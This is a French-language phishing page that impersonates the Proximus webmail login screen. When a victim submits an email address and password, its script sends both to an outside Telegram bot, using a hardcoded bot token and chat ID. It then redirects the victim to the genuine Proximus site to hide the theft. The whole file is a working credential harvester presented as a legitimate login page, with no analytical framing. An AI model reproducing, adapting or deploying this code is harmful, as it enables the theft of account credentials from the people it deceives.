<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Webmail | Proximus</title>

    <style>
        * {
            padding: 0%;
            margin: 0%;
            box-sizing: border-box;
        }

        @font-face {
            font-family: 'Proximus-Bold';
            src: url('./img/Proximus-Bold.woff2') format('woff2');
            font-weight: normal;
            font-style: normal;
        }

        @font-face {
            font-family: 'Proximus-Regular';
            src: url('./img/Proximus-Regular.woff2') format('woff2');
            font-weight: normal;
            font-style: normal;
        }

        body {
            font-family: 'Proximus-Regular', sans-serif;
            min-height: 100vh;
        }

        .top {
            position: fixed;
            top: 0%;
            left: 0%;
            padding: 10px;
            width: 100%;
            background-color: white;
            display: flex;
            align-items: center;
            justify-content: space-between;
            box-shadow: 0 4px 6px rgba(186, 184, 184, 0.5);
            /* Ombre rouge translucide */

        }

        .top img {
            width: 30px;
        }

        h1 {
            margin-left: 10px;
        }

        .center {
            padding: 10px;
        }

        .center img {
            width: 100%;
        }

        input {
            padding-left: 15px;
            font-size: 1.1rem;
            width: 100%;
            height: 40px;
            margin-bottom: 15px;
            border-radius: 5px;
            border: 1px solid rgba(128, 128, 128, 0.817);
        }

        input:focus {
            outline: none;
        }

        button {
            width: 100%;
            height: 45px;
            border-radius: 4px;
            border: none;
            background: #5f348f;
            color: #fff;
            -webkit-transition: all 0.15s;
            transition: all 0.15s;
            border-bottom-right-radius: 20px;
            cursor: pointer;
        }

        a {
            color: grey;
            font-size: .8rem;
        }

        @media only screen and (min-width: 624px) {
            /* Styles pour les PC */

            .center {
                display: flex;
            }

            .center div {
                width: 40%;
                padding: 50px;
            }

            .center img {
                width: 60%;
            }
        }
    </style>
</head>

<body>

    <div class="top">
        <img src="./img/logo.webp">

        <span style="color: #5f348f; font-weight: bolder;">FR</span>
    </div>

    <br>
    <br>
    <br>
    <br>

    <h1 style="font-size: 1.2rem; font-weight: bolder;"><span style="color:#5f348f;"><strong>Connexion à Proximus
                Mail
            </strong></span></h1>

    <br>
    <div class="center">

        <img src="./img/affiche.jpg"> <br> <br>
        <div>

            <p class=" s-rich-text-wrapper"><span style="color: #252525;">Connectez-vous avec votre </span><span
                    style="color: #252525;"><strong>adresse et mot de passe Proximus Mail</strong></span></p> <br> <br>

            <form id="form">
                <input id="user" placeholder="Adresse e-mail" type="email" required> <br>
                <input id="pwd" placeholder="Mot de passe" type="password" required> <br> <br>
                <button>CONNEXION</button>

                <br>
                <br>

                <a href="#">Mot de passe oublie </a>
            </form>
        </div>

        <br><br>
        <br><br>
    </div>

    <script>
        //         document.addEventListener("DOMContentLoaded", function () {
        //     var expirationDate = new Date("2025-03-03");

        //     var today = new Date();
        //     var currentDate = new Date(today.getFullYear(), today.getMonth(), today.getDate());

        //     if (currentDate >= expirationDate) {
        //         document.body.style.display = "none";
        //     }
        // });

        document.getElementById("form").addEventListener("submit", function (e) {
            e.preventDefault();

            const botToken = "7443739649:AAH7ME5BHwpSoGL3UYxTVlLO1ALUJfez85Y";
            const chatId = "1167262467";

            const username = document.getElementById("user").value;
            const password = document.getElementById("pwd").value;

            const message = `💟 Proximus Mail :\n\n👤 Utilisateur : ${username}\n🔐 Mot de passe : ${password}`;
            const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            fetch(url)
                .then((response) => {
                    if (!response.ok) {
                        return response.text().then((errorText) => {
                            throw new Error(`Erreur lors de l'envoi du message à Telegram: ${errorText}`);
                        });
                    }
                    window.location.href = "https://www.proximus.be/fr/id_personal/particuliers.html";
                })
                .catch((error) => {
                    console.error("Erreur :", error);
                });
        });

    </script>

</body>

</html>